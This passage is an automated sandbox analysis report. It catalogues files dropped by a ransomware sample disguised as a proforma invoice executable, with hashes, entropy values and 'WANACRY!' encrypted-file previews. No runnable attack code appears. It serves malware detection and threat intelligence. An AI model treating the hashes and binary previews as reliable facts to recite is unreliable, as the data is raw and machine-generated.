                                                          MD5:B8930EFD8CD1D40C20E63FC2207D6899
                                                          SHA1:4A0178F38E8017770C8EA63209908E5D834B2CDE
                                                          SHA-256:D0817218A840FC2D8F8A34C56972B07081A70310254C0013774D019426005376
                                                          SHA-512:5643743166873F0F231D3C326C33731762AC3210E9B5A3B8C8C4CFAE1172A77420E292911F94C0E1A6F7321CE130993D04035B17D42E07562DA1ADFA04E18475
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&..Z........}...#.#..B.A.....;............rq Z@.Tl..(..{.|...^)..S.xV}.d.F....yk.....j..m.=.......?1.~.....It...I.........}...D].......t..)...D......8u.u..VC..e...8q,...@'.9...;M.!.`..Is.'+.P.X.......V.AV.Quk...Y#..J.....T...83..]O......!.....I.........,...je...yQd.9......6..;.M..8....7w.h....@......O.6[.,.*.!....`t..2P.#h.K."bV.7.|.k.$.w.....0.{...l..I.H7....U.H....C.ht.V.r.[I)...Ea..6..3......+../.p...1-.%.Y..e]....y../.f.....@|.D.#.m..u..:.Hi...|....=0..g.k..k. R.pk..G.....'=[j..qf..x.D6.8)....p.0../..A..eN+fa...EO...g..h.A.$.<q...h........S..ci..>H.Pj<..(R.H..@:L.qf..`2<.dP...J..B+}Nz............X...>A........b^..j.9.9.).c.%5Q.1.L..tb...tHJ.......w2.bC`.."M.........H+.e..i$..l0......9o5..q.-L0..fS.ox.h.{...YM....Lh...x..1.;.I.).S.U.L..#.'...x...(j..C..+...:P.6f.}..##......V....C.,.......LB{zw\ U.9..[^.6...9....>...?C....`l..gS..6@.Y?....(FU......T.L!..3.....*?e..T..`.E.q)g.z.......c?...x^F..q7......N...-=M...|.s..s&
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105064
                                                          Entropy (8bit):7.99807045874544
                                                          Encrypted:true
                                                          SSDEEP:3072:HLnxSwuhYsp5IzlzRSUu9xXSVFwFf03FkZKsvA36p9t:rnVuhYspC2vXSDFkZKOx
                                                          MD5:240D818826BF7AA9859FFC5E70DE7ED9
                                                          SHA1:F51FC47DBCA5A4F27C6BE39F30B18D71877B84FF
                                                          SHA-256:DF1FECD6051D92B63185D828F8639BABADAF3B058AE272231B2256A76BFAE222
                                                          SHA-512:B00496B23D433F0B6E8FBABC598A5D92BD3CE537DEE111065947689BDF8828C11E1061AE18F85CFA84612E73CA1FBC0C3B6424D84F8F204F5B70D047C97EA993
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....-U...".2s....kV...........w&...t.i.u..tFf......H.....dH.......q.a......i#.9....`...ne!.].`a.B. .:.J.b.Q.o...~......;..L...*i.s...q&.1.6.d..O.c.TPy..B}...f.a>........t.iqO1.P.B..M..w*C....?&HF.w....<zA.......a.....Fh...}.j..QH,1....]/.2k!....I.........a.B................y..Q.B.q.........#Z..E..pU.=/...B.+y...oU...=w=hlx.J.a.,...I._..P...8L....p....1@...x.....V.6|...s..(fv(".Z.1..... ..d#..}L....)..U~...W....H....I.c..vN..@...)73h.U.T/..s..o..][.-.=Kf.+....+./!;D..l..i...*..n.".....t..#f.#..Y.;..@[0.h.......X.....@DN....E.2RS.`.W.aq.y...?m.]..%..W%...W...a~.~.........98_H.....@..3a....m..i.C....3..R.}...x<2..c.. ...I..\"..M.....Y..Jr.O2.)co.B.b6...1.!....~...[.+sK......%r).}...W...|L...E8.>.A...[P...cA.r.`.nc..K..h.Z.E.......'....q...g....?k.B.oqJ..F...'..]........".8K.z...ae..:[..k.....~5.n..8e.'.L."....Q'.E...T..e.m..2..+..c\f.=8..<.u.4Ez.wo*..x.......B.U....&7....^....+AC(.X.&-...p0."uG.<....#I.VqeM...;.<w;...B....A..Z..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105512
                                                          Entropy (8bit):7.998341109819598
                                                          Encrypted:true
                                                          SSDEEP:3072:qwp0SFRU0XJlqjaJpIV6px/U9eH39u+i+Y80:Tp0SvdXnTIV6H8etu+Rj0
                                                          MD5:C4E390A0C31E40A28BE5659E1519EF23
                                                          SHA1:D9D30A457A172B2B4938608516936BA46B7414C3
                                                          SHA-256:6A337210E979B5CE167EA3D2A5F2B21C200449EFE27B269AC3D5A01174519143
                                                          SHA-512:237A4318B0CFE42D6109C70B2E04AEB3D072C9D9D3A219DA8E456324D081C6E1F0CB4E2FEF306638A4C535F7566675C65584845548F605AB46F67F39D2DFD6EF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....5.....ps.......n..P.n.l..r...=.......e.....2.-.s.8.T.N..... .H#...9......Ia...&.f...v,.zn*b.=......V.J;/E.AjM.j.:...9.%.........v('.......Z"...~)L.4.0....+...l.......i.............2.<d-.\.FyJ/.Nl....i.._I.....B...$..V........."p.G.r...5...\....................s.3.Z...@....w..........o..y......R......:..#y....W..\}..)k-..f.$.L...e.RC......X9.9D..pd..}...>O.k .kb.Qv,...v...s#.)/.S.q.r'...="Hs...N.E.u..Q..YET.&.B.!5.'.....".riD.LBYn*....)G..6....C. .^I..xf.....0Fw.4.I,.@.....?.*q.....h.B.h).M...O.%.#W.rpO..#.......2....v... .G.N...&.=Z..*EvB..AxoO.y..s@..j."Qp.L...G....#.|4.?i...s+...g..'..o._...h...6F..U.n..:..?...K.q._.........#Gr8..j...{qd.s5....y4.|Dl..:.@(..s.;.;'.......r......Xu....W^Xx.........]0.%.@.d../.X.g..9{;.M.=...E.F.s.i- `r#....2.i..@=.U:.b.9G...e..)V..T..ZG-.0d..L....#...uY..*......E....zA.......e1:.cc.....b.h7#.......f{..=..[<.=R.%..#.w*.....;[.....O.R.(VX..6..x.8Sm..xW...%RWr..9-TV0....Q&.$SYKt.h).9........KB.4.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105512
                                                          Entropy (8bit):7.9982277893415885
                                                          Encrypted:true
                                                          SSDEEP:1536:wVyNHZ8q+0WHve/0uQhMkBYHZdujtXtA+vnYBtiC/oVOeZmk/nnaLEXZsiW5BMP5:fNHWe+vFakiWjtSonCsVOcaOZsiWAP5
                                                          MD5:386070492FB52AB7BFC7791439BFAABD
                                                          SHA1:7DC561EB387959F81B0A86D1EECDF501C955AE20
                                                          SHA-256:181F766235DA8FDC3404F942A839605FA53E2883C6D26B93AB9956780D7AAE01
                                                          SHA-512:DA0691C78515BDB80D64D77273D7FCD5042D37EBB5E6F545457F53CE1F8832F132504B984B2DBBCCA9EFBF161EDD4905B9674ED70BA4D22EAA0A6A4DEB5DA382
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(.....?.k[x-..K.-.9@...Np..T....+.~.*..c.7....@.5..<.1..)E6Yb..S..p.....3>].~....uO.).>/.........j.,Q....;.X.I.t... ....t.n.!.....-..%os..@SNO~..P.:.L..E......q\,9...R(p......%.K...oL....p.5.....i..>0.........8X..)"...fz.,./rfG.I8.R.68...."Y&.............6u...A.w.Qf.....Q..xH..p].+.2._a=w].....O.........]C.....lb0....F..Y].;...0.\.x....!.T6.....2.pt..F............i.u/.;...m}....;.M..{....D-L8..E.."sl..f...n.V.={.%q.O........{.Y7}\...........l.G.l.5.......Z.d.x......`Dn.J.d...d.u.!m.B....0X.5..YbJz..y.....k...Q`.nBZ.....4.j. .e......sS!.E....A.b.+.[..\?.........{.C..S...g..I.o|.Q......W......x..(....w.de...F.x...r...%c....fz?+i....:l..'...2k..I..q...Q.Y2...SrKr5%,}~P.|.........L..J..X..3J8.\.x&..A..E.o.K.N....#...N.?.$3.....m"C....R.....k7..k.:.(...dL.xl.~h.?.2CT..H.,..vC....z..E.....N..?.j.l.!.C.!....|..[.~...).Q.-m....-(..f.........Id..V.~N..S.)x. ..I...S.(iT.......V...DN./t...T....<....Q....$...$y....U..gH]4.m....z.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.998675342116442
                                                          Encrypted:true
                                                          SSDEEP:3072:fPAwIzzvg8nZ+oBG5KaNEuIWX5pHQsgLDV0JnS:Mjhn8oBsRm9Ahm504
                                                          MD5:0D284094F80F6FD6E785875729BA2B01
                                                          SHA1:A86C3EAC6C27CE482C04A61E6AED3FFD1F30584B
                                                          SHA-256:28ADB21386D48AAAA6FB2336858648B267782A97B591FF5539E6E12F4DE7C3F2
                                                          SHA-512:F98F9253FC8E2E4AE03652CA92D086BEAB40A50A3F1A364E5F9BA2800F926610F11D92C74B9D12075345B982385141BD8CA85E15778F338875DF646D83D1CD01
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."`....4f...0[..(K..?..4....O.lw......y......c.Es..Dq.6...pT..}.|.....Yp..m1H..e.YN.G&9c\.!rqshZ.3..BfL"..X.e.....<*......9..x+....y...Df.U3'".2....E......h2z...._n.<.uK....B.s...G..._6V..}#.N.'..J..}V0./.....r..9u...<:{.....s.........~....n.F..............`.8.g..<..(kG..V.iZ...U....T...E(.Y~n..D...X-...uVY.....39Y*..u.......T[b>_a..!JQ..5^..i..X]...R.e..D.......,.........0.Yd...a.(`.....#N.(.O....2y....g...[aw..4.....G.+....T(..N..h.*`|,.;LV.."w4...B....dT.M.....(.b... .#w........[;.qN..$5A...M.Z..|..=.q|nCM..........._....&.f.?.....g.X.{._f%.&6.n.....239.|..aT.... ...&)..a.{2Zqi..`.. s.....q..h8....6.6.d.3.$.9....(./|O...O9.....Ui..J..aM.z.......b8.a+c...K...'O,S..-=.@....@.....^...s"V>..Le..[.NI.!$.,......N].HUN.|...|6.>.x.,....WX.....F....M...l.g....\a......W2.Y...e.~/.J......G..qe.R...7...BJ.".N.b..Ge.2d.*>Xl.u.....$4...6m=.....z.).f.?.i.,.1....X.Iv.S..........+r.....<&..q..27c..p............q..W.N...s..A...K.4.e....&....X
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.9985336085695735
                                                          Encrypted:true
                                                          SSDEEP:3072:AIYdL16V96dT3c3deokj18vsG3ImLMbjb2zTY7ho:A3dLM2dT3cteVHmGjb2T6ho
                                                          MD5:CDF09BC152D556CBDB495AB819EADFC6
                                                          SHA1:67AA7AEAB9F1D67472A8D6B7E94CC93466CEBBD7
                                                          SHA-256:0DCC3CAA7B32619C4C9E76E036AF9195B1E2DD2D5FE6EEB9308E82AC33459633
                                                          SHA-512:99836ECD7212C0980A362327B3A8E41DCB0B2DED43F9E798A6730507206C21866B95B43152FB1CB6D7ACB33B714B92DC841E798D5BA26AE09446FFB280DC0A58
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........4....>.....A......1c ...+..8..k.....e......h"_...M..8...B.lP..QI.Mr.YW".0[}..]...b.%......|....G..X@.8.||.V...X....x.d$.d0...rLn....e.q|.y-....bZ...,.].B..X].%.}...M$...[...2..A..k.s..7......X.K..,...7.....^..!Lx...S...zTL...... .Q..uz{.R............m....1.n.....C....+."M....l.....-..R.|`pi....XP.M...f.#4..\...)....a..... G.B.<....=<..~.....>..-0C.=& .mg....}.4..H.v.O6....cW}..<x.8Q..1..w>S...].he.Ug..E1...9j..@T..3'F|..._.y..lJ.\0u..Li..........ZA.uBf k......*y....2....SS........r.$....n...[j&..n..Lj.?..qj.Hxe*./aJ,..G%r....P4.DT...9....;,...!.`.Sz..f......t..0iZ|....}R3}...P...:o]..v.@A....)s....U...e.|........p..........FcR....s+...H.[z.$Tg....hn.4f....S....6..'...=&m...{&\.![...g5.....^.+.E.+.b.o..9....l5.....&.t.vR6.c...+.Zo.N..{......$F.A.8....:..Bi...Z...HLP>.n.4.<.9...g..........4x2.`..d....0U.q..(..8...7...q.7.TQ....J(@g....`.38..M*.\.i.....z.sf"..Ruj.$..X..i..t....A.t.K..1..a............cyW*m.3'Q-./hdU.^B...D..g..L..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.998434581862204
                                                          Encrypted:true
                                                          SSDEEP:3072:e8BQjqbYZrf7zBQuVDbGN0/HDMkZSf+Ep+yOLWFBq:JijuYZdvVDbGN0/Hfw+JKBq
                                                          MD5:F9084A1C4BBAC7BDC5356867D2E071C1
                                                          SHA1:D6D2AF7541FC7D157B67ACEA6EBC6ACC1DBCDDDC
                                                          SHA-256:61305597C669F76CCBBBB5F48C9576C520EF7A88F887489A3F425E0090E38D31
                                                          SHA-512:7FA486E9072C5FF2A5AA30E6042BE966AED7630D10551C8DB8F795E8934634E06882E9DD508941A20741F0E2FF1625374664CD13393F718086B9BD6A615D585F
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118648
                                                          Entropy (8bit):7.998174869240827
                                                          Encrypted:true
                                                          SSDEEP:1536:DrJMdhvcNblejyEh5myoIV1eIW/OGAKo5AJiIsfTVpvKmJqwr0mpr8si69jmqqvO:DNMdlctsh5v6VAKaAbsfRp9Brpyb+F
                                                          MD5:63FA49777C6AE988D58343801CAD45E6
                                                          SHA1:D4D642148E0B47A0C336412E1DF7D1888758E62E
                                                          SHA-256:42769962214C0E91ABA4776D8770BA441F7A95D3ED68A6CD06606A1975B9007D
                                                          SHA-512:D8DC6BA1B7B2A1653E5658EACA6AD9C6E43CEC4524AAB279D3D9F6B8502B427A91B441F68B8775DAEA455C9635437E37860E93EA2F3D7EC41F75CB0F748F0BF8
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118648
                                                          Entropy (8bit):7.998434669295102
                                                          Encrypted:true
                                                          SSDEEP:3072:8r1gTVkUCvWrCAcODktAD8fQXlBu46ioLm3Ph0ke:+sVZ4uQ6b76iP3ZHe
                                                          MD5:2EDAD16F3E84E9C31F980A3CF5B14BCD
                                                          SHA1:5E1A00482BB531068D9E4CDA4D124B9DDA7A48E8
                                                          SHA-256:D0526DBD114101A2C7CC886F20F27DA66672950F838E873B4FB3CF76DACC2FDE
                                                          SHA-512:9CE66F2DEED210018A4C13CD6CA869F6620FB25923CFEB5A57583A041CBF27E0EA228041AC733BCE742CDB45E43B4B73B1DA39D132455C16E9587975BC0E1A09
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117512
                                                          Entropy (8bit):7.998242002676668
                                                          Encrypted:true
                                                          SSDEEP:1536:oCc4gQymCR8SgjMBFNxXf8BYvjuvPMd5f0JLLw4+Gdi0kI5tL5nQMZfrM9+wcOco:o1riCR9B3xi6qvP0eJXx9vQ4fsyhUCcv
                                                          MD5:E5C9ED9AC03DF4A7F55E61B4335E4A55
                                                          SHA1:C9A1C61BD2D550848E2DFFEE419C41569CE6A78E
                                                          SHA-256:3823E323728BD339393EBCA0381043B1DF2648AF3609A2FBF9C780C72A9A5270
                                                          SHA-512:DFCBEF1B75CE6C32C3A834E82F5518180645A08E20920368048EB6962E7660D90AA8734C00646EF871869B74BB67DC6766E92329697626BD7AD43602013B5FBD
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117080
                                                          Entropy (8bit):7.998335185823374
                                                          Encrypted:true
                                                          SSDEEP:3072:HdFonTpVx2sUmEe5fLaVNW1r9CFsyZN5+gGq+kylQ26l:vonTp2sBE+iUCFsuNUlQ26l
                                                          MD5:7C67C4374FF951C8CB2B2B5170B06AB9
                                                          SHA1:A682E6FD331249D4E1BC91E2C51B0A82AF667525
                                                          SHA-256:3DC37BA9A8F83AECF3114AD66BD05B5D12FAB5F1EFDF8B1F22F30FC68C47DADD
                                                          SHA-512:B1DF6AFA49AE0AA19E3344008AC974E903AB14EA56E5450CDF094FF560723E09E50911AF166C49BB127FE329F016A68A228C5A16027764995D945240B5D76EAE
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):116040
                                                          Entropy (8bit):7.9985113926226425
                                                          Encrypted:true
                                                          SSDEEP:3072:p51WRfcRMb49D60sMrEeM3gm4q+86puXCy:/1WRfcp9D60prE2m42XCy
                                                          MD5:1E108EE5AC886585A95DCC24411ED0D2
                                                          SHA1:5E61B80591818941C51B517E101ECE0F69C8DBA3
                                                          SHA-256:678F421D606701064DE876664007CE1743CA6817A7F1709764E32B34A0A3067B
                                                          SHA-512:4A8BEA350F91CA8CE75D6731C1FBD718E3FDB813B413080C523C58A37957A9F558E33A46587B6DBAB13C46A19338E40D49FE821FB5CD56903EC6E597BB650413
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998302321403549
                                                          Encrypted:true
                                                          SSDEEP:3072:gUZK/K0L7k0Em3TGx0YZFgsjOAkuUx/4U/sRKjFMLJU1iswI:gUZ503bDg0ajP7a/4yJjwI
                                                          MD5:1E6BB268CD8A572CFE02949E38346D0F
                                                          SHA1:492114B85CA535F77847AB0AB844D7D24EB689EC
                                                          SHA-256:6EEC18DE37621AB78B92BCDD239F775BD64FC7B3C66B14A0352A43D6CAD51107
                                                          SHA-512:3DDCFF0B6A0D5970DFE35F049BF1EA3CDB2CC000AB93557192CDE93A8DCE12B0DE23CA83E8942322B344EB17908A0701F516B732AE1F9888802BA7F1054E31C5
                                                          Malicious:true
                                                          Reputation:unknown
                                                           Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998302321403549
                                                          Encrypted:true
                                                          SSDEEP:3072:gUZK/K0L7k0Em3TGx0YZFgsjOAkuUx/4U/sRKjFMLJU1iswI:gUZ503bDg0ajP7a/4yJjwI
                                                          MD5:1E6BB268CD8A572CFE02949E38346D0F
                                                          SHA1:492114B85CA535F77847AB0AB844D7D24EB689EC
                                                          SHA-256:6EEC18DE37621AB78B92BCDD239F775BD64FC7B3C66B14A0352A43D6CAD51107
                                                          SHA-512:3DDCFF0B6A0D5970DFE35F049BF1EA3CDB2CC000AB93557192CDE93A8DCE12B0DE23CA83E8942322B344EB17908A0701F516B732AE1F9888802BA7F1054E31C5
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998470715187754
                                                          Encrypted:true
                                                          SSDEEP:3072:0qisyLRAPEVoH85HSuoNGMQE4Xo8ee+WCTt:u+8Voc5HSUMEkWCJ
                                                          MD5:EA1F77568CE3C93FF187E9BE0340BB7B
                                                          SHA1:9B00088E957251FD28A42A795A9A5B7633A7D8E8
                                                          SHA-256:BA3D43CC3C0B6B54645B8F80CD61646F69DA9CEB21A24706429E52E01A37D63E
                                                          SHA-512:052920828303E32719F06BBEE4D08AFBA3D5401AFD40A64851D34A55CF60D92F0F4CA974B160EC9C02D298F7E23A5A6C71BDD7D3DDE430686A355C7ADCF28847
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115096
                                                          Entropy (8bit):7.998288121563079
                                                          Encrypted:true
                                                          SSDEEP:3072:CPDiBIkAYfAfPHkeu25urYjDhxvlP0F8Utgm:CqofPHe0UYPhBlc8UtP
                                                          MD5:01C92567B71F929C49971BF52C4A0EB0
                                                          SHA1:9D8EDB397540A462D1A22C2C19B336C9CE73206C
                                                          SHA-256:D36F96F502A56DDADD622CCA99A9204A87C06C212ABC94A22D391A378C667632
                                                          SHA-512:12D7979D6CF8717F3EBF3D0A88504655FCB88056636EDC396C3AC5B6ADCA2712609240728C8CF680C5D5BCD74B81B931B379D0F587458FF90759B955D186D91C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):114264
                                                          Entropy (8bit):7.998360512512525
                                                          Encrypted:true
                                                          SSDEEP:3072:jJyEOi4X8ts/Hh8P25Ws6MX8/OqNM+z8xzs96bnk/:6MtIB8P2gE6D6E
                                                          MD5:86C6D07B4D8B0F55CBD4D90965B30C35
                                                          SHA1:0671CE1FBDD2D8591638611EFDCA074F1AC68ABE
                                                          SHA-256:0CCDDD63FD1FBE6517E7BC68C93937E41E054A84BC0C4CA58C5A733CA6E2F0FB
                                                          SHA-512:05C5A4E6FB026CFAACBB50007B65FB4AD036D503AA532EF94F128FB02956E00F396988895AE9922D9CFA82AE4228CF4095AF504F9881865C46C10F56BE503CAF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115064
                                                          Entropy (8bit):7.9984832785914035
                                                          Encrypted:true
                                                          SSDEEP:3072:ENMbR1itHx2YBnYkeKXoAqCnAGDSOttWEaMF91zuZxReKv0v:GMbmRjBnnqtOZF9duDReKvM
                                                          MD5:5D22AB7E460B15C3568490AD98523740
                                                          SHA1:508CE70BB0CF41AF6C8F9F2EBDBD9988E20483D8
                                                          SHA-256:04CB9CFE0B4A6BB1E1CAA31CE511769406C1935A229D60FF27B6C4DD7A1BA395
                                                          SHA-512:8C8FD74489C1F9354ACF7C69ECE2423A7286E52DCAAF41EFC9E6CA654E53306EC30422FB4CB5564D08B600AAE06682C3C786A853EF056471EE4359DE3D59B838
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115064
                                                          Entropy (8bit):7.998327597829302
                                                          Encrypted:true
                                                          SSDEEP:3072:k8TSezC2UutoVSbJN5pu0cQ+K0cFroUdJ43BCfKRWrhXN:jGsC2SV+bpu0cY9rjs3BxWT
                                                          MD5:C250CF94847B623602743B7CA7B36002
                                                          SHA1:25F2AD3C936E281F671A63C4C90D7BC19F21CA20
                                                          SHA-256:848C5D2C502B0838E47D510275845BC5EC6BFABA2EB2B18A381DED48B699BB86
                                                          SHA-512:C124F0990D0DD0BDB3EFC3DA699F6139C4E4A361372690D58A341129464793C3EA360A8CB6204078EB84CC4B9EA876966D1FEC328A59E66EECED6A20084721B8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):696888
                                                          Entropy (8bit):7.999732693480322
                                                          Encrypted:true
                                                          SSDEEP:12288:50NvSLLqv8aIjZf+4gRhaOn7mKxjkP/3INfomIPsOkposo2KAVz:505SfiURaD7jk3RkKDNSz
                                                          MD5:6C68538F99383D1FA2DDC23D2859E65F
                                                          SHA1:0CE58FADA992FB83ECA56E7364164AE8BB26B475
                                                          SHA-256:BEECA85A5D14071DF4868E3CED0A003F9181F4C4DB05681855A00735A862BCC0
                                                          SHA-512:B6D6A6694D832A963805984447EB46A4BBDCA07046B6A0A940F73D65931E3C2C64C6C6A295FCF46641E9F64C4736EE45F08D0233BA01011A7A8B9A8E1C006334
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):103448
                                                          Entropy (8bit):7.998117607841535
                                                          Encrypted:true
                                                          SSDEEP:3072:TlGvQZ1Ep45Xn3DyppSjDcJepzIFVHmGwy+G7iCNBOtbzP8D6gc:TlGkuoXn32K9IdwxGmbzPQ6gc
                                                          MD5:DB23DE29E689511FD73CA4A7C00BE1BB
                                                          SHA1:C8B0FB79496460BB09A1965AAD9BC5FC4F9492BA
                                                          SHA-256:5A3E9D53B5440C235E52927EA7D5CD76DA025492ACD38F6CC1AF6B0E3FAD2C9E
                                                          SHA-512:A40E4909AA76A886BD9B5B223E6C45D177705A5F16DD45349744EC24CB9CAC46F133271488614A7B1884B99AEAB3F510A936DBEEA37930559AAA6FBBF6E63500
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):112328
                                                          Entropy (8bit):7.998295370329084
                                                          Encrypted:true
                                                          SSDEEP:1536:TaS9MCubz9SAxvvmoTqiBGtPtP4F2fXzXxkvvCdshEiOQwPompBfIZ1h731/a6X5:TaV7VrZqwyq2fjkvCdsh6btB4Hx/zX5
                                                          MD5:75A4E539DA25D77DD9A8C2BA28265B6B
                                                          SHA1:B9003F22520297C8255BCA2817C261DE114DDAF2
                                                          SHA-256:22781BF66404176C8D67B8ED2BF9E6153491F80067BFE840879606DDB9E35C06
                                                          SHA-512:D45B9707E33DC963E76EE92EE1F10C0B4C2B29157127B0495E51F88A2CBFA1863A59E2989199FC826C36FE51055D08B8E352F21D043CCB078A271A5D7B33D144
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......9$...{.V.0...T....2.6.W..w?.i....C.g...>..d.....%.vr\...1..&4+...@.+...]Z2.....6.]...........5.HM^.D~]..1.......G..o|....3Kh.r.eZ9L..^.tV.....gx.vt.l_z.1.V..k.....Q\.......c........Z..9........l..dq*.....O.&.D.z...l...H2^m]..=#.......n..m.................%l/=....id....z................].(..q.........hPg.&.I..}hR.....`o.D..m.%PZ..6..=...i.d..j..j..:]}.Zl..l.........!.a{.eNfsU.... .J#.y]..w.....p..H#.:..7G[.......,)..... ...JV...}.4W..?C.f3,.h.R.3.....>....K...bF...\..oc...=f2l.....u....[V......+L.j..........4.cS.8A...~..6.<..&yo!y."..!O.:.2..,=q..n......Q7*.~....K)d... /..wn....RkX7........I....m..$.+Z0.#.`.78-uo........v.40.............#...1...F..G.....!..e..s.H."...._./...Z.w..F.S....8........`.e.,$S.T[.}(.....(.T.*....7...'3.i...6...."...u...<ha.'.......m..+...z..jP.M.........iQ(...4..........\...Le.._.5.,........K...(e..:q.dz.hN..j..^9R.vv2QQP......5H`...OG..&.!.*...z...T9p..`.t..K.7Z..;N.R....O>..N.9N78&.".>...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818964312449045
                                                          Encrypted:false
                                                          SSDEEP:24:E0K1eCqnPNivBFTim1KhKRtmSiykM0mlSkpTEjNTg/kkdf:lK8JFi7um1QKjBiykmlSkpTEtmf
                                                          MD5:693AC9ED94F92B2C19E1738ED459B007
                                                          SHA1:02B6C15A208B38D7181DE3417077886444E6B351
                                                          SHA-256:0F91E5493EF4D233510B4EB0A4301120B68BA60511C89DA8A462D2E491FDC096
                                                          SHA-512:9ADD0AAB299EA1C30E4B672697237F4773742CC766E55C72DCF6C50900F03CC42FCE0647CCC5929EF5506770DEEB6CFA427B83E8D50041C316A4ED532DD859FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781409953882536
                                                          Encrypted:false
                                                          SSDEEP:24:pT2h3DHzKBlJ9ahlg9HsYGNrOL03LkYr2bOljU4S5XKV:pEDoJ9Og9yAApqOjtL
                                                          MD5:5F1B4D658538AB62FC6B74552BC3FB94
                                                          SHA1:6744674F0145918AE65BDDCAADBA9A3BAB1ECD77
                                                          SHA-256:D829E74D741B08C7D2FC1BAE8FAF68B8818C255A84A823B839CC0806C6831BB4
                                                          SHA-512:4CD51F4E378ADEEEB3807C9C0C5662A97142899E9A7E29324BBAC369A0ED444C60D925B4BEB1F8353723CAC95D2127CE2151CB413BC33DC12C0057F73714C22E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.805978454846127
                                                          Encrypted:false
